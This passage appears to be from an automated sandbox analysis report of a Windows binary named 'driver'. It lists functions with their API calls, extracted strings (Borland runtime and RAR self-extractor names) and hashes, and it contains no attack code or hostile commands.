                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                    • String ID: @Borlndmm@SysFreeMem$qqrpv$@Borlndmm@SysGetMem$qqri$@Borlndmm@SysReallocMem$qqrpvi$borlndmm
                                                                                                                                                                    • API String ID: 667068680-1352882558
                                                                                                                                                                    • Opcode ID: 79ab65274c950a907bc5b7c4912583e509e0328d3c5856cbfe1910c4dfd05c11
                                                                                                                                                                    • Instruction ID: 9fb059b0bed8664ec8effdcc6ab324d9a1ae628e0724f862a889f5317183f5de
                                                                                                                                                                    • Opcode Fuzzy Hash: 79ab65274c950a907bc5b7c4912583e509e0328d3c5856cbfe1910c4dfd05c11
                                                                                                                                                                    • Instruction Fuzzy Hash: 90018470280306AFF7209E25C885B6B7358EB4AB15F28782BB881A7340D77D9C61C65A
                                                                                                                                                                    Function 0043F568 Relevance: 12.9, Strings: 10, Instructions: 370COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: +$-$0$9$A$F$I$N$N$N
                                                                                                                                                                    • API String ID: 0-1648577461
                                                                                                                                                                    • Opcode ID: 03c54a20e9876c7d3805fef400ece367fa6b169767753c26b4429ca31b1aae4b
                                                                                                                                                                    • Instruction ID: 6477a31f05a4ce1f52e52661df36f3edf6e061d756a6520c054383fd83cdbd4c
                                                                                                                                                                    • Opcode Fuzzy Hash: 03c54a20e9876c7d3805fef400ece367fa6b169767753c26b4429ca31b1aae4b
                                                                                                                                                                    • Instruction Fuzzy Hash: F5E1BF74D04249EBDF18CFA8D4846EEBBB1AF4D304F20916BD815A3351D7398E4ACB59
                                                                                                                                                                    Function 0043FA60 Relevance: 12.9, Strings: 10, Instructions: 368COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: +$-$0$9$A$F$I$N$N$N
                                                                                                                                                                    • API String ID: 0-1648577461
                                                                                                                                                                    • Opcode ID: 491cb68e0e0fb4b08416bf1b40cfae5e2c4245f261d64271f7ba7e5f09aa907a
                                                                                                                                                                    • Instruction ID: ad3149547f98e3762700875b1da681a355d791a3b4096acdd51e867e23b8f28a
                                                                                                                                                                    • Opcode Fuzzy Hash: 491cb68e0e0fb4b08416bf1b40cfae5e2c4245f261d64271f7ba7e5f09aa907a
                                                                                                                                                                    • Instruction Fuzzy Hash: 00E19CB4D0420ADADF10CFA8D5846EEBBB0BF5D300F20A16BE855A3351D7399E49CB59
                                                                                                                                                                    Function 00404BDC Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 79libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040C794: GetVersionExA.KERNEL32(?), ref: 0040C7B7
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(shell32.dll), ref: 00404C11
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHFileOperationW), ref: 00404C20
                                                                                                                                                                    • SHFileOperationA.SHELL32(?), ref: 00404CF4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressFileHandleModuleOperationProcVersion
                                                                                                                                                                    • String ID: SHFileOperationW$T$T$shell32.dll
                                                                                                                                                                    • API String ID: 2706894985-3673844351
                                                                                                                                                                    • Opcode ID: 617293aeb286d2e9d1149bb70090394c1ae255b4d8b2c95015911c4a78d5a60e
                                                                                                                                                                    • Instruction ID: 62c26b7987e5be2b3992bd07797493bb5548b890ba34ee03b2a49b9df9a75b50
                                                                                                                                                                    • Opcode Fuzzy Hash: 617293aeb286d2e9d1149bb70090394c1ae255b4d8b2c95015911c4a78d5a60e
                                                                                                                                                                    • Instruction Fuzzy Hash: 1A21B6B191131856EB30DB659D81BDD72E8BF44304F0445EAAA08F6281EFB99E488BD9
                                                                                                                                                                    Function 00440BCC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00440BD8
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00440BE5
                                                                                                                                                                    • GetVersionExA.KERNEL32 ref: 00440C0A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProcVersion
                                                                                                                                                                    • String ID: Borland32$GetProcAddress$kernel32.dll
                                                                                                                                                                    • API String ID: 3310240892-88975745
                                                                                                                                                                    • Opcode ID: 82f48deadf02bcecc629b89f5661a206f4b5f1231b28dffacef765fadc81367e
                                                                                                                                                                    • Instruction ID: 6af0671b471137b6c67441672297779c2547ba14f705b6621febd97a6834098b
                                                                                                                                                                    • Opcode Fuzzy Hash: 82f48deadf02bcecc629b89f5661a206f4b5f1231b28dffacef765fadc81367e
                                                                                                                                                                    • Instruction Fuzzy Hash: 4DF090B1104B00E7F318AF209CCB77A35A4B321346F50031BA65549293EBBDC46AD61E
                                                                                                                                                                    Function 00440A88 Relevance: 9.1, APIs: 6, Instructions: 95filewindowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000080,?,00000000), ref: 00440AC7
                                                                                                                                                                    • MessageBoxA.USER32(00000000,?,00000001,00000000), ref: 00440B12
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000), ref: 00440B1E
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00448164,00000002,?,00000000,000000F4,?,00000000), ref: 00440B33
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,00000000,00448164,00000002,?,00000000,000000F4,?,00000000), ref: 00440B48
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00448167,00000002,?,00000000,00000000,?,00000000,?,00000000,00000000,00448164,00000002,?,00000000,000000F4), ref: 00440B5B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$Write$HandleMessageModuleName
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1009477876-0
                                                                                                                                                                    • Opcode ID: 4bcc2ea353aee45e89cc7be7893a39effff8846296b54148c66a0baa31ffc874
                                                                                                                                                                    • Instruction ID: 8c57af180ccc573a8b780f88f6dcd6c1528daebccff4d52b51dbec63a25f15ff
                                                                                                                                                                    • Opcode Fuzzy Hash: 4bcc2ea353aee45e89cc7be7893a39effff8846296b54148c66a0baa31ffc874
                                                                                                                                                                    • Instruction Fuzzy Hash: 4521D774500348BAFA20ABA19C46FAF335CDB01719F00462BB744A51C3EBBC6E55C66E
                                                                                                                                                                    Function 0042EC5C Relevance: 8.9, Strings: 7, Instructions: 163COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWide
                                                                                                                                                                    • String ID: .%s%s1$.rar$.rar$exe$part$rar$sfx
                                                                                                                                                                    • API String ID: 626452242-3165010692
                                                                                                                                                                    • Opcode ID: 7201bf97f69c9356af873b1d139bc082232d294f43a04730fdbefe9957b1c244
                                                                                                                                                                    • Instruction ID: 07ebf74136ac25a4c354435bb20ddb52bc694dd10399aac50d4f4f90215f63ba
                                                                                                                                                                    • Opcode Fuzzy Hash: 7201bf97f69c9356af873b1d139bc082232d294f43a04730fdbefe9957b1c244
                                                                                                                                                                    • Instruction Fuzzy Hash: E251C671D0021C9BDF24EB51DD42BDDB3B8EF44304F5445BAE908A2292EB789F49CB99
                                                                                                                                                                    Function 0042C898 Relevance: 8.8, Strings: 7, Instructions: 97COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareString
                                                                                                                                                                    • String ID: EML$ERR$LOG$NUL$OFF$SND$rar.log
                                                                                                                                                                    • API String ID: 1825529933-4270793461
                                                                                                                                                                    • Opcode ID: 85d9c96de884524f1d0111d5b80b4c4d9dc96974f349940ed5553c60a4d2ec78
                                                                                                                                                                    • Instruction ID: 97cdf3624b06b075a20cae36206c7d3ef6d1d18997c7b22c34d78c9982aacbc3
                                                                                                                                                                    • Opcode Fuzzy Hash: 85d9c96de884524f1d0111d5b80b4c4d9dc96974f349940ed5553c60a4d2ec78
                                                                                                                                                                    • Instruction Fuzzy Hash: 8431D86070C651CBEB11EA35D0847AB66D59B00344FD8C47BC89A8B296D77CD98A871E
                                                                                                                                                                    Function 0043EF7C Relevance: 7.8, Strings: 6, Instructions: 263COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ($+INF$+NAN$-INF$-NAN$G
                                                                                                                                                                    • API String ID: 0-2347845670
                                                                                                                                                                    • Opcode ID: 033afd44c147ae4c141b1ff3871ccd70d90262113afda73615374d9b698aa4cf
                                                                                                                                                                    • Instruction ID: 3a86d4b129bf81fd06d2cf139d83e621e18d664b51563da8e1807894b089c8e9
                                                                                                                                                                    • Opcode Fuzzy Hash: 033afd44c147ae4c141b1ff3871ccd70d90262113afda73615374d9b698aa4cf
                                                                                                                                                                    • Instruction Fuzzy Hash: 5C815E21D04195DBDF268A2CD4D03AF7FA29B5E310F1462B7E8955B382C57D8C49C39A
                                                                                                                                                                    Function 0043F280 Relevance: 7.7, Strings: 6, Instructions: 242COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ($+INF$+NAN$-INF$-NAN$G
                                                                                                                                                                    • API String ID: 0-2347845670
                                                                                                                                                                    • Opcode ID: e185a2b027bc307bad70baa2b99fd723e1cee67e2cc3640934481166e012596b
                                                                                                                                                                    • Instruction ID: ba1ee921011d32f2f47d5f004ee55f149b5c72e9e4e252bc6758268698b2e095
                                                                                                                                                                    • Opcode Fuzzy Hash: e185a2b027bc307bad70baa2b99fd723e1cee67e2cc3640934481166e012596b
                                                                                                                                                                    • Instruction Fuzzy Hash: F781FD62D1021596CB209F58D8817AF73B1EF78324F24A177EC499B354E37D8D8AC38A
                                                                                                                                                                    Function 004300AC Relevance: 7.7, APIs: 5, Instructions: 174COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • BackupRead.KERNEL32(?,?,?,?,00000000,00000001,?), ref: 00430121
                                                                                                                                                                    • BackupSeek.KERNEL32(?,000000FF,7FFFFFFF,?,?,?), ref: 0043015F
                                                                                                                                                                    • BackupSeek.KERNEL32(?,000000FF,7FFFFFFF,?,?,?), ref: 0043021B
                                                                                                                                                                    • BackupRead.KERNEL32(?,?,00000014,?,00000000,00000001,?), ref: 00430284
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Backup$ReadSeek
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3699205498-0
                                                                                                                                                                    • Opcode ID: 00b97335902644343562bbef917f5091112418a71cd7b9b69dd9eba4a467e717
                                                                                                                                                                    • Instruction ID: 36f0dce0988dbb668a71ffb835b08e871a8b620aebce59870dd1223545070050
                                                                                                                                                                    • Opcode Fuzzy Hash: 00b97335902644343562bbef917f5091112418a71cd7b9b69dd9eba4a467e717
                                                                                                                                                                    • Instruction Fuzzy Hash: 9C51A370900209EFEF24CF50C895BAFB3B5FB48715F1087ABE815AA284D7799E44CB95
                                                                                                                                                                    Function 00411C50 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 194COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Char
                                                                                                                                                                    • String ID: awbw
                                                                                                                                                                    • API String ID: 751630497-1791679509
                                                                                                                                                                    • Opcode ID: db5ca5d4be89b30d0fdcc6b2be847b87ea337a2d8483a941f02fa3252474088e
                                                                                                                                                                    • Instruction ID: 4ad40a05f7d3e976f26b27cfc52a4d72161adf4706d0e30100ce3bf39dbbd1a3
                                                                                                                                                                    • Opcode Fuzzy Hash: db5ca5d4be89b30d0fdcc6b2be847b87ea337a2d8483a941f02fa3252474088e
                                                                                                                                                                    • Instruction Fuzzy Hash: A181E8B5E043189ADB20DB64CC41BDEB3B5EF45304F4045EFE509A2291DB786B89CF9A
                                                                                                                                                                    Function 004406B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • Error: system code page access failure; MBCS table not initialized, xrefs: 004406FD
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Info
                                                                                                                                                                    • String ID: Error: system code page access failure; MBCS table not initialized
                                                                                                                                                                    • API String ID: 1807457897-362886185
                                                                                                                                                                    • Opcode ID: 4806acd9c607d03e312d64e6599b10aca0405e0a0ca6d1a8839d096c7c1baad6
                                                                                                                                                                    • Instruction ID: 9d05ae88c09a69884778c74515466c5296e843407f370a86ec078ae298f79ccc
                                                                                                                                                                    • Opcode Fuzzy Hash: 4806acd9c607d03e312d64e6599b10aca0405e0a0ca6d1a8839d096c7c1baad6
                                                                                                                                                                    • Instruction Fuzzy Hash: EB315D319042414AF7119B38484037F77949B42329F2582BBCE96DB3C2D77C6C668B8F
                                                                                                                                                                    Function 0042FBD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileSecurityW.ADVAPI32(?,00000007,?,00002000,?,?,?,?), ref: 0042FC30
                                                                                                                                                                    • GetFileSecurityA.ADVAPI32(?,00000007,?,00002000,?), ref: 0042FC43
                                                                                                                                                                    • GetSecurityDescriptorLength.ADVAPI32(?,?,?,?), ref: 0042FC76
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Security$File$DescriptorLength
                                                                                                                                                                    • String ID: ACL
                                                                                                                                                                    • API String ID: 2361174398-707211160
                                                                                                                                                                    • Opcode ID: db5b1bf1136c0dd96ac55a4dd794e1d94cc01a6ae8ec397052e3e2f708cd35fe
                                                                                                                                                                    • Instruction ID: 3d34ec5302a0a2a1ac8e9c47c8e126c50b99106e3035f748f6222cc97c040511
                                                                                                                                                                    • Opcode Fuzzy Hash: db5b1bf1136c0dd96ac55a4dd794e1d94cc01a6ae8ec397052e3e2f708cd35fe
                                                                                                                                                                    • Instruction Fuzzy Hash: 5C212C7170021877FB10A766DC86BEB72ACEF44318F90057BB808E62C2EB7C5E44866D
                                                                                                                                                                    Function 00433E00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(00000017,00448C48,?,?,004339AD), ref: 00433E0B
